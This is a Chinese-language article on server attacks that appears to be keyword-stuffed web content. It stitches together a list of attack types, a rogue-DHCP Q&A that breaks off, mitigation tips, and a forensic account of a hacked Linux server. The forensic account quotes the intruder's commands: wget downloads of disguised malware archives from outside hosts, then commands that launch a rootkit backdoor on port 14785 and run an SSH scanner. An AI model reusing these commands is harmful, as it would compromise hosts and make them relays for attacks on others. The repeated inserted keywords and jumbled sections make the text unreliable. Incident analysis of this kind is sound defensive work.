服務器攻擊類型有哪些入侵服務器?作為服務器管理員來說,當服務器受到攻擊時我們要清楚是哪種類型的攻擊,這樣才好對標解決問題。總體來說服務器常遇到的攻擊有以下幾種:
1入侵服務器、DDoS(分布式拒絕服務)攻擊
這個DDoS攻擊其實就是流量攻擊,它的原理就是利用很多客戶端向服務器發(fā)送大量的請求,使服務器的網(wǎng)絡過載、服務器負載飆升,從而讓其它合法用戶無法正常請求服務器入侵服務器。從本質(zhì)上說DDoS帶來的流量也是正常的流量,所以一般DDoS是很難防御的。
DDoS攻擊針對的是服務器的網(wǎng)絡層。
2、CC攻擊
CC攻擊原理就是黑客利用大量的主機(客戶端)向我們的服務(特別是消耗CPU時間的服務)不停的請求,造成服務器資源浪費,CC攻擊時服務器CPU常常是占滿狀態(tài)的。
CC攻擊針對的是WEB應用層(如網(wǎng)站)。
3、WEB攻擊
這種攻擊主要是利用當前的WEB應用存在的漏洞進行系統(tǒng)及數(shù)據(jù)破壞的行為,手段通常有:
SQL注入
XSS、CSRF攻擊
爆庫攻擊等
4、劫持攻擊
攻擊者通過攻擊DNS服務器或者更改DNS服務器來將請求重定向至其它服務器,比如釣魚網(wǎng)站就是一種劫持。
5、服務器系統(tǒng)及應用漏洞攻擊
這種就是嗅探服務器及其系統(tǒng)上的應用是否存在可利用的漏洞,然后針對性的攻擊,比如Redis提權(quán)、弱口令提權(quán)等。
怎樣分析一臺被入侵的linux服務器?
客戶反映一臺linux服務器老向外ssh掃描,登陸到服務器上,查看進程發(fā)現(xiàn)大量ssh-scan在運行,運行用戶為mircte,查找ssh-scan這個文件,確定所在位置/var/log目錄下 黑客進入服務器后所做的操作入侵服務器: 1。 向/var/tmp/下上傳了兩個惡意程序 其中wtf為向外掃描其它服務器的ssh-scan黑客軟件,。
access。log文件下存放有rootkit后門,服務器被當成了肉雞跳板,開放14785端口等待入侵者連接,掃描其它服務器所得到的賬號都發(fā)送到diavolu_gol@yahoo。com這個郵箱。 2。 入侵者登陸記錄 85。
120。78。140的IP來自羅馬尼亞! 3。 wget 。clan。su/scan/wtf。jpg ; tar zxvf wtf。jpg wget adelinuangell。lx。ro/ryo。tar tar xvf ryo。
tar cd 。access。log 。/config Ady 14785 。/run 結(jié)束進程。刪掉程序。。刪掉用戶。修改root密碼。
如何防止非法DHCP服務器的入侵呢?
1、非法DHCP帶來的災害:一般公司內(nèi)部都會有一個DHCP服務器來給員工計算機提供必要的網(wǎng)絡參數(shù)信息的,例如IP地址,子網(wǎng)掩碼,網(wǎng)關(guān),DNS等地址,很多情況路由器就可以擔當此重任。每次員工計算機啟動后都會向網(wǎng)絡中發(fā)送廣播包尋找DHCP服務器(前提是該計算機被設置為自動獲得IP地址),廣播包隨機發(fā)送到網(wǎng)絡中,當有一臺DHCP服務器收到這個廣播包后就會向該包源MAC地址的計算機發(fā)送一個應答信息,同時從自己的地址池中抽取一個IP地址分配給該計算機。
合法DHCP服務器可以提供正確的數(shù)據(jù),非法DHCP服務器則提供的是錯誤的數(shù)據(jù)。我們?nèi)绾巫寙T工機器都通過合法DHCP服務器獲得網(wǎng)絡信息呢?如果是交換式網(wǎng)絡則沒有可能,因為廣播包會發(fā)向網(wǎng)絡中的所有設備,合法還是非法服務器先應答是沒有任何規(guī)律的。這樣網(wǎng)絡就被徹底擾亂了,原本可以正常上網(wǎng)的機器再也不能連接到INTERNET。
2、消極防范:既然廣播包會發(fā)向網(wǎng)絡中的所有設備,合法還是非法服務器先應答是沒有任何規(guī)律的,那么我們可以通過多次嘗試廣播包的發(fā)送來臨時解決這個問題,直到客戶機可以得到真實的地址為止。問題中網(wǎng)友使用的方法就是此手段。
服務器攻擊如何處理?服務器受到攻擊后,我們要針對性處理,以下是對應的解決方案:
1、DDoS攻擊處理方案
聯(lián)系機房做流量清洗,必要時使用高防IP;
使用CDN來分流;
實在不行把域名解析至 127.0.0.1 ;
2、CC攻擊處理方案
系統(tǒng)要合理利用緩存,對于一些結(jié)果做好緩存,避免每次都去重復計算;
利用軟防限制每個IP的連接數(shù)限制;
請求過多時啟用驗證碼驗證是否是機器行為;
3、WEB攻擊處理方案
對于GET、POST請求做過濾,將一些敏感字符過濾掉;
對于用戶提交的數(shù)據(jù),務必做好數(shù)據(jù)類型檢查和過濾;
數(shù)據(jù)庫SQL語句不要使用拼接字符串這種形式,應該采用預編譯和參數(shù)綁定這種方式;
如果WEB應用是采用開源CMS或者框架二次開發(fā)的,務必及時修復其官方發(fā)布的補丁;
站點目錄及文件的讀、寫、執(zhí)行權(quán)限要嚴格控制,特別是要注意upload目錄的權(quán)限,防止上傳了動態(tài)腳本甚至能直接執(zhí)行;
4、服務器系統(tǒng)及應用漏洞處理方案
做好端口策略,防火墻里只開放必要的端口(除了WEB端口外,其它端口要特別留意);
服務器上不常用的服務全部停止掉;
WEB程序被破壞時使用備份文件還原;